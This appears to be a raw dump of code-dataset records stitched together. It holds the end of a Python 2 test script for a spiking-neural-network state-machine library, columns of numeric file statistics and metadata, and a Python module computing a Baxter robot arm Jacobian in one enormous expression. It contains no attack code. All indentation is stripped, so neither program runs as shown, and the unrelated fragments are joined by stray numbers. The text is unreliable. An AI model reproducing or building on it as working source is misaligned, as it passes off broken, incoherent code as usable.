fsa.oneNeuronHalfTurnsOnState(n1,0,ca3,0)
fsa.stateHalfTurnsOnState(ca2,0,ca3,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(ca3.get_data().segments[0].spiketrains[0]) == 0
if not success:
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = ca2.get_data()
print "ca2"
print data.segments[0].spiketrains[0]
data = ca3.get_data()
print "ca3"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
print "Neuron And State To State NotState - {}".format(success)
def neuronAndStateToNeuron():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
fsa.oneNeuronHalfTurnsOnOneNeuron(n1,0,n2,0)
fsa.stateHalfTurnsOnOneNueron(ca2,0,n2,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
fsa.turnOnStateFromSpikeSource(spikeGen,ca2,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(n2.get_data().segments[0].spiketrains[0]) > 0
if not success:
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = ca2.get_data()
print "ca2"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
data = n2.get_data()
print "n2"
print data.segments[0].spiketrains[0]
print "Neuron And State To Neuron - {}".format(success)
def neuronAndStateToNeuron_NotNeuron():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
fsa.oneNeuronHalfTurnsOnOneNeuron(n1,0,n2,0)
fsa.stateHalfTurnsOnOneNueron(ca2,0,n2,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
neal.nealApplyProjections()
fsa.turnOnStateFromSpikeSource(spikeGen,ca2,0)
sim.run(runtime)
success = len(n2.get_data().segments[0].spiketrains[0]) == 0
if not success:
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = ca2.get_data()
print "ca2"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
data = n2.get_data()
print "n2"
print data.segments[0].spiketrains[0]
print "Neuron And State To Neuron NotNeuron - {}".format(success)
def neuronAndStateToNeuron_NotState():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
fsa.oneNeuronHalfTurnsOnOneNeuron(n1,0,n2,0)
fsa.stateHalfTurnsOnOneNueron(ca2,0,n2,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(n2.get_data().segments[0].spiketrains[0]) == 0
if success:
return
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = ca2.get_data()
print "ca2"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
data = n2.get_data()
print "n2"
print data.segments[0].spiketrains[0]
print "Neuron And State To Neuron NotState - {}".format(success)
def threeStateRule():
"""
STATE1 ===>
+ ===> N1 ===>
STATE2 ===> + ===> A1 ===> STATE4
STATE3 ===>
"""
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateHalfTurnsOnOneNueron(ca,0,n1,0)
fsa.stateHalfTurnsOnOneNueron(ca2,0,n1,0)
fsa.oneNeuronHalfTurnsOnOneNeuron(n1,0,n2,0)
fsa.stateHalfTurnsOnOneNueron(ca3,0,n2,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+10]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca2,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+15]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca3,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(n2.get_data().segments[0].spiketrains[0]) > 0
if(not success):
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = ca2.get_data()
print "ca2"
print data.segments[0].spiketrains[0]
data = ca3.get_data()
print "ca3"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
data = n2.get_data()
print "n2"
print data.segments[0].spiketrains[0]
print "Three State Rule - {}".format(success)
def oneNeuronStopsCA():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
fsa.oneNeuronTurnsOffState(n1,0,ca,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(ca.get_data().segments[0].spiketrains[0]) == len(n1.get_data().segments[0].spiketrains[0])
if(not success):
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
print "One Neuron stops CA - {}".format(success)
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
stateToState()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
stateToNeuron()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
twoStateToState()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
twoStateToState_Half()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
twoStateToNeuron()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
twoStateToNeuron_Half()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
neuronToState()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
neuronToNeuron()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
twoNeuronToState()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
twoNeuronToState_Half()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
twoNeuronToNeuron()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
twoNeuronToNeuron_Half()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
neruonAndStateToState()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
neruonAndStateToState_NotNeuron()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
neruonAndStateToState_NotState()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
neuronAndStateToNeuron()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
neuronAndStateToNeuron_NotNeuron()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
neuronAndStateToNeuron_NotState()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
threeStateRule()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
oneNeuronStopsCA()
sim.end()
| 28.142515
| 108
| 0.657219
| 3,027
| 23,499
| 5.025107
| 0.034688
| 0.041417
| 0.076918
| 0.142003
| 0.92558
| 0.918349
| 0.902045
| 0.902045
| 0.899941
| 0.892643
| 0
| 0.046372
| 0.203455
| 23,499
| 834
| 109
| 28.176259
| 0.766268
| 0.001192
| 0
| 0.829392
| 0
| 0
| 0.043631
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.005068
| null | null | 0.266892
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6f915f5768c864bd648907fd51932f4176fdc3c1
| 24,177
|
py
|
Python
|
python/baxter_bon_appetit/src/baxter_essentials/baxter_jacobian.py
|
san99tiago/tesis
|
70e452cfa9eedbbe64347e2bd8826bb295473d01
|
[
"MIT"
] | 4
|
2021-03-09T19:59:50.000Z
|
2021-03-31T01:28:24.000Z
|
python/baxter_bon_appetit/src/baxter_essentials/baxter_jacobian.py
|
san99tiago/tesis
|
70e452cfa9eedbbe64347e2bd8826bb295473d01
|
[
"MIT"
] | null | null | null |
python/baxter_bon_appetit/src/baxter_essentials/baxter_jacobian.py
|
san99tiago/tesis
|
70e452cfa9eedbbe64347e2bd8826bb295473d01
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# Built-in imports
import math
# General module imports
import numpy as np
class BaxterJacobian:
"""
Calculate Baxter's Jacobian from w0 to tool.
Remark: the expression used was calculated based on the article
"Baxter Humanoid Robot Kinematics" from Ohio University.
:param baxter_distances: list of baxter_distances from BaxterClass.
:param joint_values: list of joint-values.
example: [value_limb_s0, value_limb_s1, value_limb_left_e0,
value_limb_left_e1, value_limb_left_w0, value_limb_left_w1,
value_limb_left_w2]
:param limb: arm to calculate jacobian.
example: "left" or "right".
"""
def __init__(self, baxter_distances, joint_values, limb):
self.baxter_distances = baxter_distances
self.joint_values = joint_values
self.limb = limb
def calculate_jacobian(self):
t1 = self.joint_values[0]
t2 = self.joint_values[1]
t3 = self.joint_values[2]
t4 = self.joint_values[3]
t5 = self.joint_values[4]
t6 = self.joint_values[5]
L1 = self.baxter_distances[1]
L2 = self.baxter_distances[2]
L3 = self.baxter_distances[3]
L4 = self.baxter_distances[4]
L5 = self.baxter_distances[5]
if (self.limb == "left"):
return "LEFT JACOBIAN NOT DEFINED"
return np.array([[ (math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) + math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)))*(math.sin(t3)*(math.cos(t4)*(L1 + L2*math.cos(t2)) + math.cos(t2)*(L4 + L3*math.sin(t4))) + L5*math.sin(t5)*(math.cos(t4)*math.sin(t2) + math.cos(t2)*math.cos(t3)*math.sin(t4))) + (math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)))*(math.sin(t3)*(math.sin(t4)*(L1 + L2*math.cos(t2)) - L3*math.cos(t2)*math.cos(t4)) + L5*math.sin(t5)*(math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4)) - L5*math.cos(t2)*math.cos(t5)*math.sin(t3)) - (math.cos(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) - math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)))*(L4*(math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4)) - math.cos(t3)*(L1 + L2*math.cos(t2)) + L3*math.sin(t2) + L5*math.cos(t5)*(math.cos(t4)*math.sin(t2) + math.cos(t2)*math.cos(t3)*math.sin(t4))), (math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) + math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)))*(math.cos(t3)*(L4 + L2*math.cos(t4) + L3*math.sin(t4)) - L5*math.sin(t3)*math.sin(t4)*math.sin(t5)) - (math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)))*(math.cos(t3)*(L3*math.cos(t4) + L5*math.cos(t5) - L2*math.sin(t4)) - L5*math.cos(t4)*math.sin(t3)*math.sin(t5)) - math.sin(t3)*(math.cos(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) - math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)))*(L2 + L4*math.cos(t4) - L5*math.cos(t5)*math.sin(t4)), (math.cos(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) - math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)))*(L3 + L4*math.sin(t4) + L5*math.cos(t4)*math.cos(t5)) - L5*math.cos(t4)*math.sin(t5)*(math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) + math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - L5*math.sin(t4)*math.sin(t5)*(math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))), L4*(math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) + math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - L5*math.cos(t5)*(math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))), L5*math.cos(t5)*(math.cos(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) - math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - L5*math.sin(t5)*(math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) + math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))), 0, 0],
[ (math.cos(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) + math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)))*(L4*(math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4)) - math.cos(t3)*(L1 + L2*math.cos(t2)) + L3*math.sin(t2) + L5*math.cos(t5)*(math.cos(t4)*math.sin(t2) + math.cos(t2)*math.cos(t3)*math.sin(t4))) - (math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) + math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)))*(math.sin(t3)*(math.sin(t4)*(L1 + L2*math.cos(t2)) - L3*math.cos(t2)*math.cos(t4)) + L5*math.sin(t5)*(math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4)) - L5*math.cos(t2)*math.cos(t5)*math.sin(t3)) - (math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)))*(math.sin(t3)*(math.cos(t4)*(L1 + L2*math.cos(t2)) + math.cos(t2)*(L4 + L3*math.sin(t4))) + L5*math.sin(t5)*(math.cos(t4)*math.sin(t2) + math.cos(t2)*math.cos(t3)*math.sin(t4))), (math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) + math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)))*(math.cos(t3)*(L3*math.cos(t4) + L5*math.cos(t5) - L2*math.sin(t4)) - L5*math.cos(t4)*math.sin(t3)*math.sin(t5)) - (math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)))*(math.cos(t3)*(L4 + L2*math.cos(t4) + L3*math.sin(t4)) - L5*math.sin(t3)*math.sin(t4)*math.sin(t5)) + math.sin(t3)*(math.cos(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) + math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)))*(L2 + L4*math.cos(t4) - L5*math.cos(t5)*math.sin(t4)), L5*math.cos(t4)*math.sin(t5)*(math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - (math.cos(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) + math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)))*(L3 + L4*math.sin(t4) + L5*math.cos(t4)*math.cos(t5)) + L5*math.sin(t4)*math.sin(t5)*(math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) + math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))), L5*math.cos(t5)*(math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) + math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - L4*(math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))), L5*math.sin(t5)*(math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - L5*math.cos(t5)*(math.cos(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) + math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))), 0, 0],
[ 0, (math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4))*(math.cos(t3)*(L4 + L2*math.cos(t4) + L3*math.sin(t4)) - L5*math.sin(t3)*math.sin(t4)*math.sin(t5)) + (math.cos(t4)*math.sin(t2) + math.cos(t2)*math.cos(t3)*math.sin(t4))*(math.cos(t3)*(L3*math.cos(t4) + L5*math.cos(t5) - L2*math.sin(t4)) - L5*math.cos(t4)*math.sin(t3)*math.sin(t5)) - math.cos(t2)*math.sin(t3)**2*(L2 + L4*math.cos(t4) - L5*math.cos(t5)*math.sin(t4)), math.cos(t2)*(L3*math.sin(t3) + L5*math.cos(t3)*math.sin(t5) + L4*math.sin(t3)*math.sin(t4) + L5*math.cos(t4)*math.cos(t5)*math.sin(t3)), L4*(math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4)) + L5*math.cos(t5)*(math.cos(t4)*math.sin(t2) + math.cos(t2)*math.cos(t3)*math.sin(t4)), L5*math.cos(t2)*math.cos(t5)*math.sin(t3) - L5*math.sin(t5)*(math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4)), 0, 0],
[ (math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) + math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)))*(math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4)) - (math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)))*(math.sin(t2)*math.sin(t4) + math.cos(t2)*math.cos(t3)*math.cos(t4)) + math.cos(t2)*math.sin(t3)*(math.cos(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) - math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))), math.sin(t1 + 0.7854), -math.cos(t1 + 0.7854)*math.cos(t2), math.cos(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) - math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)), math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)), math.cos(t5)*(math.cos(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) - math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - math.sin(t5)*(math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) + math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))), math.cos(t6)*(math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) + math.sin(t5)*math.sin(t6)*(math.cos(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) - math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) + math.cos(t5)*math.sin(t6)*(math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) + math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)))],
[ (math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) + math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)))*(math.sin(t2)*math.sin(t4) + math.cos(t2)*math.cos(t3)*math.cos(t4)) - (math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)))*(math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4)) - math.cos(t2)*math.sin(t3)*(math.cos(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) + math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))), -math.cos(t1 + 0.7854), -math.sin(t1 + 0.7854)*math.cos(t2), - math.cos(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)), - math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)), math.sin(t5)*(math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t5)*(math.cos(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) + math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))), - math.cos(t6)*(math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) + math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.sin(t5)*math.sin(t6)*(math.cos(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) + math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t5)*math.sin(t6)*(math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)))],
[ (math.cos(t4)*math.sin(t2) + math.cos(t2)*math.cos(t3)*math.sin(t4))*(math.sin(t2)*math.sin(t4) + math.cos(t2)*math.cos(t3)*math.cos(t4)) + (math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4))**2 + math.cos(t2)**2*math.sin(t3)**2, 0, -math.sin(t2), math.cos(t2)*math.sin(t3), - math.cos(t4)*math.sin(t2) - math.cos(t2)*math.cos(t3)*math.sin(t4), math.cos(t2)*math.cos(t5)*math.sin(t3) - math.sin(t5)*(math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4)), math.cos(t5)*math.sin(t6)*(math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4)) - math.cos(t6)*(math.cos(t4)*math.sin(t2) + math.cos(t2)*math.cos(t3)*math.sin(t4)) + math.cos(t2)*math.sin(t3)*math.sin(t5)*math.sin(t6)]])
# bj = BaxterJacobian(bc.BaxterClass().baxter_distances, [0, 0, 0, 0, 0, 0, 0], "left")
# print(bj.calculate_jacobian())
| 416.844828
| 3,902
| 0.382181
| 3,071
| 24,177
| 2.993813
| 0.029306
| 0.291603
| 0.238851
| 0.134871
| 0.8933
| 0.890907
| 0.885578
| 0.881879
| 0.875897
| 0.875897
| 0
| 0.157654
| 0.440129
| 24,177
| 57
| 3,903
| 424.157895
| 0.521572
| 0.029119
| 0
| 0
| 0
| 0
| 0.001238
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.074074
| 0
| 0.259259
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
